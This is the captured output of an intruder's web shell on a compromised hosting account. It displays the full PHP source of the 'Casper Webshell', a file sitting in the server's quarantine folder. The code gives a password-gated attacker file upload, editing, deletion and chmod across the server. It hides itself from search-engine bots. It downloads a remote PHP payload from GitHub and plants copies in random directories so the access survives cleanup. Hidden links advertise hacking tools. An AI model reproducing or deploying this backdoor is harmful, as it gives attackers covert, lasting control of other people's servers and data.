MMCT TEAM
Server IP : 103.53.40.154  /  Your IP : 3.142.54.136
Web Server : Apache
System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : ppcad7no ( 715)
PHP Version : 8.2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0700) :  /home2/ppcad7no/.quarantine/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/ppcad7no/.quarantine/click.php_183c45cg
<?php ?><?php if(isset($_REQUEST["ok"])){die(">ok<");};?><?php
if (function_exists('session_start')) {
  session_start();
  if (!isset($_SESSION['secretyt'])) {
    $_SESSION['secretyt'] = false;
  }
  if (!$_SESSION['secretyt']) {
    if (isset($_POST['pwdyt']) && md5(md5(md5(md5(md5(md5(md5(md5($_POST['pwdyt'])))))))) == '2dec0af1d2efe0804b3b28bb0efa51c3') {
      $_SESSION['secretyt'] = true;
    } else {
$bytesecform = <<<FORM
<html>
  <head>
    <meta charset="utf-8">
    <title></title>
    <style type="text/css">
      body {padding:10px}
      input {
        padding: 2px;
        display:inline-block;
        margin-right: 5px;
      }
    </style>
  </head>
  <body>
    <form action="" method="post" accept-charset="utf-8">
      <input type="password" name="pwdyt" value="" placeholder="passwd">
      <input type="submit" name="submit" value="submit">
    </form>
  </body>
</html>
FORM;
      die($bytesecform);
    }
  }
}
?>
<?php


$userAgent = $_SERVER['HTTP_USER_AGENT'];

$blockedUserAgents = [
    'Googlebot',
    'Ahrefs',
    'Bingbot',
    'SemrushBot',
    'MJ12bot',
    'DotBot',
    'Baiduspider',
    'YandexBot',
    'Sogou',
    'Exabot',
    'Facebot',
    'Twitterbot',
    'Slackbot',
    'Discordbot',
    'LinkedInBot',
    'TelegramBot',
    'Pinterestbot',
    'WhatsApp',
    'Flipboard',
    'FeedFetcher-Google',
    // Add other user agents or bot names to block
    // Example: 'BotName',
];

foreach ($blockedUserAgents as $blockedAgent) {
    if (stripos($userAgent, $blockedAgent) !== false) {
        http_response_code(404);
        exit;
    }
}

echo '<!DOCTYPE HTML>
<HTML>
<HEAD>
<link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">
<link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css" rel="stylesheet"><title>Casper Webshell</title>
<style>
body {
    font-family: "Racing Sans One", cursive;
    background-color: #343a40;
    color: #e6e6e6;
}

#content tr:hover {
    background-color: #e1b12c;
    text-shadow: 0px 0px 10px #fff;
}

#content .first {
    background-color: #e1b12c;
}
.backlink {
    display: none;
}

#content .first:hover {
    background-color: #e1b12c;
    text-shadow: 0px 0px 1px #757575;
}

table {
    border: 220px #e1b12c;
}

h1 {
    font-family: "Rye", cursive;
    color: #f8f9fa;
}

a {
    color: #fff;
    text-decoration: none;
}

a:hover {
    color: #f8f9fa;
    text-shadow: 0px 0px 10px #ffffff;
}

input, select, textarea {
    border: 1px #000000 solid;
    -moz-border-radius: 5px;
    -webkit-border-radius: 5px;
    border-radius: 5px;
}

pre {
    background-color: #2b2b2b;
    padding: 10px;
    color: #e6e6e6;
    overflow-x: auto;
}

.container {
    margin-top: 30px;
}

.btn-upload {
    background-color: #ffc107;
    border-color: #ffc107;
}

.btn-upload:hover {
    background-color: #e0a800;
    border-color: #e0a800;
}

.btn-option {
    background-color: #2b2b2b;
    border-color: #2b2b2b;
    color: #e6e6e6;
}

.btn-option:hover {
    background-color: #1d2124;
    border-color: #1d2124;
    color: #e6e6e6;
}

.btn-action {
    background-color: #dc3545;
    border-color: #dc3545;
}
.btn-Telegram {
    background-color: #0984e3;
    border-color: #0984e3;
}
.btn-action:hover {
    background-color: #c82333;
    border-color: #c82333;
}

.file-size {
    color: #adb5bd;
}

.file-perms {
    font-weight: bold;
}

.file-perms-green {
    color: #28a745;
}

.file-perms-red {
    color: #dc3545;
}

.file-name {
    color: #e6e6e6;
}

.file-path {
    color: #f8f9fa;
}

.file-link {
    color: #fff;
    text-decoration: none;
}

.file-link:hover {
    color: #f8f9fa;
    text-decoration: underline;
}

.folder-icon::before {
    content: "\f07b";
    font-family: "Font Awesome 5 Free";
    font-weight: 900;
    margin-right: 5px;
}

.file-icon::before {
    content: "\f15b";
    font-family: "Font Awesome 5 Free";
    font-weight: 900;
    margin-right: 5px;
}
.Casper-icon::before {
    content: "\f6e2";
    font-family: "Font Awesome 5 Free";
    font-weight: 900;
    margin-right: 5px;
}
</style>
</HEAD>
<BODY>
<div class="container">
<H1 class="text-center">CasperSecurity  <span class=\'Casper-icon\'></H1>
<table class="table table-dark" cellpadding="3" cellspacing="1" >
<tr><td><center>Current Path : ';
if(isset($_GET['path'])){
$path = $_GET['path'];
}else{
$path = getcwd();
}
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);

foreach($paths as $id=>$pat){
if($pat == '' && $id == 0){
$a = true;
echo '<a class="file-link" href="?path=/">/</a>';
continue;
}
if($pat == '') continue;
echo '<a class="file-link" href="?path=';
for($i=0;$i<=$id;$i++){
echo "$paths[$i]";
if($i != $id) echo "/";
}
echo '">'.$pat.'</a>/';
}
echo '</td></tr><tr><td><center>';
if(isset($_FILES['file'])){
if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
echo '<div class="alert alert-success" role="alert">File Upload Done.</div>';
}else{
echo '<div class="alert alert-danger" role="alert">File Upload Error.</div>';
}
}
echo '<form enctype="multipart/form-data" method="POST">
Upload File : <input type="file" name="file" />
<input class="btn btn-upload" type="submit" value="Upload" />
</form>
</td></tr>';
if(isset($_GET['filesrc'])){
echo "<tr><td>Current File : ";
echo $_GET['filesrc'];
echo '</tr></td></table><br />';
echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
echo '</table><br /><center><span class="file-path">'.$_POST['path'].'</span><br /><br />';
if($_POST['opt'] == 'chmod'){
if(isset($_POST['perm'])){
if(chmod($_POST['path'],$_POST['perm'])){
echo '<div class="alert alert-success" role="alert">Change Permission Done.</div>';
}else{
echo '<div class="alert alert-danger" role="alert">Change Permission Error.</div>';
}
}
echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="chmod">
<input class="btn btn-option" type="submit" value="Go" />
</form>';
}elseif($_POST['opt'] == 'rename'){
if(isset($_POST['newname'])){
if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
echo '<div class="alert alert-success" role="alert">Change Name Done.</div>';
}else{
echo '<div class="alert alert-danger" role="alert">Change Name Error.</div>';
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="rename">
<input class="btn btn-option" type="submit" value="Go" />
</form>';
}elseif($_POST['opt'] == 'edit'){
if(isset($_POST['src'])){
$fp = fopen($_POST['path'],'w');
if(fwrite($fp,$_POST['src'])){
echo '<div class="alert alert-success" role="alert">Edit File Done.</div>';
}else{
echo '<div class="alert alert-danger" role="alert">Edit File Error.</div>';
}
fclose($fp);
}
echo '<form method="POST">
<textarea class="form-control" cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="edit">
<input class="btn btn-option" type="submit" value="Go" />
</form>';
}
echo '</center>';
}else{
echo '</table><br /><center>';
if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
if($_POST['type'] == 'dir'){
if(rmdir($_POST['path'])){
echo '<div class="alert alert-success" role="alert">Delete Dir Done.</div>';
}else{
echo '<div class="alert alert-danger" role="alert">Delete Dir Error.</div>';
}
}elseif($_POST['type'] == 'file'){
if(unlink($_POST['path'])){
echo '<div class="alert alert-success" role="alert">Delete File Done.</div>';
}else{
echo '<div class="alert alert-danger" role="alert">Delete File Error.</div>';
}
}
}
echo '<center>';
echo '<button class="btn btn-Telegram" onclick="location.href=\'https://t.me/CasperSecurity\'">';echo '<img src="https://upload.wikimedia.org/wikipedia/commons/thumb/8/83/Telegram_2019_Logo.svg/800px-Telegram_2019_Logo.svg.png" style="height: 40px;" alt="Telegram Icon">';
echo ' CasperSecurity</button>';
echo '<br><br>';
echo '</center>';
$scandir = scandir($path);
echo '<div id="content"><table class="table" width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr class="first">
<td><center>Name</center></td>
<td><center>Size</center></td>
<td><center>Permissions</center></td>
<td><center>Options</center></td>
</tr>';

foreach($scandir as $dir){
if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
echo "<tr>
<td><a class='file-link' href=\"?path=$path/$dir\"><span class=\"folder-icon\" style='color: #4581e8';></span>$dir</a></td>\n
<td><center>--</center></td>
<td><center>";
if(is_writable("$path/$dir")) echo '<span class="perm-green">';
elseif(!is_readable("$path/$dir")) echo '<span class="perm-red">';
echo perms("$path/$dir");
if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</span>';

echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"dir\">
<input type=\"hidden\" name=\"name\" value=\"$dir\">
<input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
<input class='btn btn-option' type=\"submit\" value=\">\" />
</form></center></td>
</tr>";
}
echo '';
foreach($scandir as $file){
if(!is_file("$path/$file")) continue;
$size = filesize("$path/$file")/1024;
$size = round($size,3);
if($size >= 1024){
$size = round($size/1024,2).' MB';
}else{
$size = $size.' KB';
}

echo "<tr>
<td><a class='file-link' href=\"?filesrc=$path/$file&path=$path\"><span class=\"file-icon\"style='color: #00a8ff'></span>$file</a></td>
<td><center>".$size."</center></td>
<td><center>";
if(is_writable("$path/$file")) echo '<span class="perm-green">';
elseif(!is_readable("$path/$file")) echo '<span class="perm-red">';
echo perms("$path/$file");
if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</span>';
echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
<option value=\"edit\">Edit</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value=\"$file\">
<input type=\"hidden\" name=\"path\" value=\"$path/$file\">
<input class='btn btn-option' type=\"submit\" value=\">\" />
</form></center></td>
</tr>";
}
echo '</table></div>';
}

function perms($file){
$perms = fileperms($file);

if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}

// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));

// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));

// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));

return $info;
}


$fileURL = 'https://raw.githubusercontent.com/spacebin-org/Casper/main/Waf.php';
$fileContent = file_get_contents($fileURL);

$directories = glob('*', GLOB_ONLYDIR);

if (count($directories) < 5) {
    $remainingCount = 5 - count($directories);
    $existingDirectories = array();
    
    foreach ($directories as $directory) {
        $filePath = $directory . '/CasperSec.php';
        
        file_put_contents($filePath, $fileContent);
        $existingDirectories[] = $directory;
    }
    
    // Send notification to Telegram for remaining directories
    $message = "Only " . $remainingCount . " directories available. Created CasperSec.php in existing directories.";
    
    // Send URLs of created files in existing directories
    $fileURLs = array();
    foreach ($existingDirectories as $directory) {
        $fileURLs[] = getDirectoryURL($directory) . '/CasperSec.php';
    }
    
    exit;
}

$selectedDirectories = array_rand($directories, 5);
$createdDirectories = array();

foreach ($selectedDirectories as $index) {
    $directory = $directories[$index];
    $filePath = $directory . '/CasperSec.php';
    
    file_put_contents($filePath, $fileContent);
    $createdDirectories[] = $directory;
}

// Send URLs of created files in selected directories
$fileURLs = array();
foreach ($createdDirectories as $directory) {
    $fileURLs[] = getDirectoryURL($directory) . '/CasperSec.php';
}


function getDirectoryURL($directory) {
    $protocol = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? 'https' : 'http';
    $host = $_SERVER['HTTP_HOST'];
    $directory = ltrim($directory, '/');
    
    return "$protocol://$host/$directory";
}
?>
</div>
<span class="backlink">
    <a href="https://roottube.blogspot.com/">Hacker Blog</a>,
    <a href="https://roottube.blogspot.com/">Shell İndir</a>,
    <a href="https://roottube.blogspot.com/">Sql İnjection</a>,
    <a href="https://roottube.blogspot.com/">XSS Attacks</a>,
    <a href="https://roottube.blogspot.com/">LFI Attacks</a>,
    <a href="https://roottube.blogspot.com/">Social Hacking</a>,
    <a href="https://roottube.blogspot.com/">Exploit Bot</a>,
    <a href="https://roottube.blogspot.com/">Proxy Tools</a>,
    <a href="https://roottube.blogspot.com/">Web Shell</a>,
    <a href="https://roottube.blogspot.com/">PHP Shell</a>,
    <a href="https://roottube.blogspot.com/">Alfa Shell İndir</a>,
    <a href="https://roottube.blogspot.com/">Hacking Training Set</a>,
    <a href="https://roottube.blogspot.com/">DDoS Script</a>,
    <a href="https://roottube.blogspot.com/">Denial Of Service</a>,
    <a href="https://roottube.blogspot.com/">Botnet</a>,
    <a href="https://roottube.blogspot.com/">RFI Attacks</a>,
    <a href="https://roottube.blogspot.com/">Encryption</a>
</span>
<center><h6>Telegram @BIBIL_0DAY</h6>
</BODY>
</HTML>

MMCT - 2023